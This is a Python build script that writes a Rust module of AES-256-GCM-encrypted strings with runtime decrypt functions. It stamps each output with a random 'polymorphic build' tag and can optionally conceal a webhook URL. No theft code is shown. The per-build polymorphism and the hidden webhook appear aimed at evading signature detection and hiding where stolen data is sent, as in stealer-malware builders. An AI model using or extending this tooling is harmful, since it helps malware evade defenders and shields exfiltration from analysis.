#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import os
import random
import hashlib
from datetime import datetime

from Crypto.Cipher import AES
from Crypto.Util import Padding


def format_bytes(data: bytes) -> str:
    parts = []
    for i in range(0, len(data), 16):
        chunk = data[i:i+16]
        hex_str = ", ".join(f"0x{b:02X}" for b in chunk)
        parts.append(f"    {hex_str},")
    return "\n".join(parts)


def aes256gcm_encrypt(plaintext: str, key: bytes) -> tuple:
    nonce = os.urandom(12)
    cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
    ciphertext, tag = cipher.encrypt_and_digest(plaintext.encode('utf-8'))
    return ciphertext, nonce, tag


def generate_module(
    strings: list,
    output_path: str,
    include_webhook: bool = False,
    webhook_url: str = "",
    webhook_key: int = 0,
    webhook_bytes: list = None,
):
    lines = []
    lines.append("// AUTO-GENERATED by build.py - DO NOT EDIT")
    lines.append(f"// Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    lines.append(f"// Polymorphic build: {hashlib.sha256(os.urandom(32)).hexdigest()[:16]}")
    lines.append("")
    lines.append("#![allow(dead_code, non_upper_case_globals)]")
    lines.append("")
    lines.append("use aes_gcm::{aead::Aead, KeyInit, Aes256Gcm, Nonce};")
    lines.append("")

    string_data = []

    for func_name, plaintext in strings:
        key = os.urandom(32)
        ciphertext, nonce, tag = aes256gcm_encrypt(plaintext, key)
        combined_ct = ciphertext + tag
        string_data.append({
            'name': func_name,
            'key': key,
            'nonce': nonce,
            'data': combined_ct,
            'comment': plaintext,
        })

    for entry in string_data:
        func_name = entry['name']
        comment = entry['comment'][:50].replace('#', '').replace('\n', ' ').strip()
        upper = func_name.upper()

        lines.append(f"// {func_name}: {comment}")
        lines.append(f"static KEY_{upper}: [u8; 32] = [")
        lines.append(format_bytes(entry['key']))
        lines.append("];")
        lines.append(f"static NONCE_{upper}: [u8; 12] = [")
        lines.append(format_bytes(entry['nonce']))
        lines.append("];")
        lines.append(f"static DATA_{upper}: &[u8] = &[")
        lines.append(format_bytes(entry['data']))
        lines.append("];")
        lines.append("")

    lines.append("// ===== Runtime decrypt functions =====\n")

    for entry in string_data:
        func_name = entry['name']
        upper = func_name.upper()

        lines.append(f"pub fn s_{func_name}() -> String {{")
        lines.append(f"    let cipher = Aes256Gcm::new_from_slice(&KEY_{upper}).unwrap();")
        lines.append(f"    let nonce = Nonce::from_slice(&NONCE_{upper});")
        lines.append(f"    let plaintext = cipher.decrypt(nonce, DATA_{upper}).unwrap_or_default();")
        lines.append(f"    String::from_utf8(plaintext).unwrap_or_default()")
        lines.append(f"}}")
        lines.append("")

    if include_webhook and webhook_url:
        wh_key = os.urandom(32)
        wh_ct, wh_nonce, wh_tag = aes256gcm_encrypt(webhook_url, wh_key)
        wh_combined = wh_ct + wh_tag

        lines.append("// ===== Webhook Construction (AES-256-GCM) =====\n")
        lines.append("pub fn get_webhook_aes_key() -> &'static [u8; 32] {")
        lines.append("    static KEY: [u8; 32] = [")
        lines.append(format_bytes(wh_key))
        lines.append("    ];")
        lines.append("    &KEY")
        lines.append("}")
        lines.append("")
        lines.append("pub fn get_webhook_nonce() -> &'static [u8; 12] {")
        lines.append("    static NONCE: [u8; 12] = [")
        lines.append(format_bytes(wh_nonce))
        lines.append("    ];")
        lines.append("    &NONCE")
        lines.append("}")
        lines.append("")
        lines.append("pub fn get_webhook_ciphertext() -> &'static [u8] {")
        lines.append("    static CT: &[u8] = &[")
        lines.append(format_bytes(wh_combined))
        lines.append("    ];")
        lines.append("    CT")
        lines.append("}")
        lines.append("")
        lines.append("pub fn decrypt_webhook() -> Option<String> {")
        lines.append("    let key = Aes256Gcm::new_from_slice(get_webhook_aes_key()).ok()?;")
        lines.append("    let nonce = Nonce::from_slice(get_webhook_nonce());")
        lines.append("    let plaintext = key.decrypt(nonce, get_webhook_ciphertext()).ok()?;")
        lines.append("    String::from_utf8(plaintext).ok()")
        lines.append("}")

    with open(output_path, 'w', encoding='utf-8') as f:
        f.write('\n'.join(lines))
        f.write('\n')

    print(f"[OK] Generated {output_path} with {len(strings)} AES-256-GCM strings")
